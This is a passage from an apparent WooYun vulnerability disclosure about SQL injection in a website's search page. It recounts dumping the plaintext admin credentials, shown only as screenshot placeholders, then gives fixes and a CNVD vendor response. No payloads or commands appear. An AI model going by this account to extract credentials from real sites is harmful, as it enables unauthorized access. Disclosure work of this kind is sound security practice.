+----------+------------------+


Dump it, and the back-end admin usernames and passwords are all right there, in plaintext no less. Speechless...

[Screenshot: 4.png (zhk_admin dump)]


One last table: tys_admin (speechless again, nothing but weak passwords)

[Screenshot: 7.png (tys_admin dump)]


OK, proof ends here.

Remediation:

They had it coming! Concretely: pass stext to the query in 1search.php as a bound parameter (prepared statement) instead of splicing it into the SQL string; restrict the web application's MySQL account to its own database (the current one can enumerate all 15, including mysql); and stop storing administrator passwords in plaintext.

Copyright notice: when reposting, please credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-30 09:02

Vendor reply:

CNVD has confirmed the reported situation and has passed it via CNCERT to the Shanxi branch center, which will coordinate handling with the website's operating unit.

Latest status:

None yet